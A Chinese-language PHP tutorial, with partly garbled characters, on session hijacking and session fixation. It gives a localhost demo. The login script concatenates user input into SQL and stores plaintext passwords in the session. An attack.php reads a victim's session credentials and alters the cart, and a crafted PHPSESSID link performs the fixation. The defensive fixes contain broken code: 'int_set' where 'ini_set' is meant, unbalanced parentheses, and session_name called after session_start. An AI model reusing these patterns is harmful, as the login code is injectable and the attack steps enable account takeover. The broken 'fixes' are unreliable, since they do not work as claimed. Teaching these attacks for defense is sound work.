服務(wù)端和客戶端之間是通過session(會話)來連接溝通。當客戶端的瀏覽器連接到服務(wù)器后，服務(wù)器就會建立一個該用戶的session。每個用戶的session都是獨立的，并且由服務(wù)器來維護。每個用戶的session是由一個獨特的字符串來識別，成為session id。用戶發(fā)出請求時，所發(fā)送的http表頭內(nèi)包含session id 的值。服務(wù)器使用http表頭內(nèi)的session id來識別時哪個用戶提交的請求。

session保存的是每個用戶的個人數(shù)據(jù)，一般的web應(yīng)用程序會使用session來保存通過驗證的用戶賬號和密碼。在轉(zhuǎn)換不同的網(wǎng)頁時，如果需要驗證用戶身份，就是用session內(nèi)所保存的賬號和密碼來比較。session的生命周期從用戶連上服務(wù)器后開始，在用戶關(guān)掉瀏覽器或是注銷時用戶session_destroy函數(shù)刪除session數(shù)據(jù)時結(jié)束。如果用戶在20分鐘內(nèi)沒有使用計算機的動作，session也會自動結(jié)束。

php處理session的應(yīng)用架構(gòu)

會話劫持

會話劫持是指攻擊者利用各種手段來獲取目標用戶的session id。一旦獲取到session id，那么攻擊者可以利用目標用戶的身份來登錄網(wǎng)站，獲取目標用戶的操作權(quán)限。

攻擊者獲取目標用戶session id的方法:

1）暴力破解:嘗試各種session id，直到破解為止。

2）計算:如果session id使用非隨機的方式產(chǎn)生，那么就有可能計算出來

3）竊取:使用網(wǎng)絡(luò)截獲，xss攻擊等方法獲得

會話劫持的攻擊步驟

實例

//login.php 
session_start(); 
if (isset($_POST["login"])) 
{ 
$link = mysql_connect("localhost", "root", "root") 
or die("無法建立MySQL數(shù)據(jù)庫連接：" . mysql_error()); 
mysql_select_db("cms") or die("無法選擇MySQL數(shù)據(jù)庫"); 
if (!get_magic_quotes_gpc()) 
{ 
$query = "select * from member where username=’" . addslashes($_POST["username"]) . 
"’ and password=’" . addslashes($_POST["password"]) . "’"; 
} 
else 
{ 
$query = "select * from member where username=’" . $_POST["username"] . 
"’ and password=’" . $_POST["password"] . "’"; 
} 
$result = mysql_query($query) 
or die("執(zhí)行MySQL查詢語句失?。? . mysql_error()); 
$match_count = mysql_num_rows($result); 
if ($match_count) 
{ 
$_SESSION["username"] = $_POST["username"]; 
$_SESSION["password"] = $_POST["password"]; 
$_SESSION["book"] = 1; 
mysql_free_result($result); 
mysql_close($link); 
header("Location: http://localhost/index.php?user=" . 
$_POST["username"]); 
} 

…..

//index.php 
// 打開Session 
session_start(); 
 
訪客的 Session ID 是：echo session_id(); ?> 
 
 
訪客：echo htmlspecialchars($_GET["user"], ENT_QUOTES); ?> 
 
 
book商品的數(shù)量：echo htmlspecialchars($_SESSION["book"], ENT_QUOTES); ?> 
如果登錄成功，使用 
$_SESSION["username"] 保存賬號 
$_SESSION["password"] 保存密碼 
#_SESSION["book"] 保存購買商品數(shù)目 

登錄以后顯示

開始攻擊

//attack.php 
php 
    // 打開Session 
    session_start(); 
    echo "目標用戶的Session ID是：" . session_id() . "<br />"; 
    echo "目標用戶的username是：" . $_SESSION["username"] . "<br />"; 
    echo "目標用戶的password是：" . $_SESSION["password"] . "<br />"; 
    // 將book的數(shù)量設(shè)置為2000 
    $_SESSION["book"] = 2000; 
?> 

提交 http://localhost/attack.php?PHPSESSID=5a6kqe7cufhstuhcmhgr9nsg45 此ID為獲取到的客戶session id,刷新客戶頁面以后

客戶購買的商品變成了2000

session固定攻擊

黑客可以使用把session id發(fā)給用戶的方式，來完成攻擊

http://localhost/index.php?user=dodo&PHPSESSID=1234 把此鏈接發(fā)送給dodo這個用戶顯示

然后攻擊者再訪問 http://localhost/attack.php?PHPSESSID=1234 后，客戶頁面刷新，發(fā)現(xiàn)

商品數(shù)量已經(jīng)成了2000

防范方法

1）定期更改session id

函數(shù) bool session_regenerate_id([bool delete_old_session])

delete_old_session為true，則刪除舊的session文件；為false，則保留舊的session，默認false，可選

在index.php開頭加上

session_start();

session_regenerate_id(TRUE);

……

這樣每次從新加載都會產(chǎn)生一個新的session id

2）更改session的名稱

session的默認名稱是PHPSESSID,此變量會保存在cookie中，如果黑客不抓包分析，就不能猜到這個名稱，阻擋部分攻擊

session_start();

session_name("mysessionid");

……

3）關(guān)閉透明化session id

透明化session id指當瀏覽器中的http請求沒有使用cookies來制定session id時，sessioin id使用鏈接來傳遞；打開php.ini，編輯

session.use_trans_sid = 0

代碼中

int_set("session.use_trans_sid", 0);

session_start();

……

4）只從cookie檢查session id

session.use_cookies = 1 表示使用cookies存放session id

session.use_only_cookies = 1 表示只使用cookies存放session id，這可以避免session固定攻擊

代碼中

int_set("session.use_cookies", 1);

int_set("session.use_only_cookies", 1); p>

5）使用URL傳遞隱藏參數(shù)

session_start();

$seid = md5(uniqid(rand()), TRUE));

$_SESSION["seid"] = $seid;

攻擊者雖然能獲取session數(shù)據(jù)，但是無法得知$seid的值，只要檢查seid的值，就可以確認當前頁面是否是web程序自己調(diào)用的。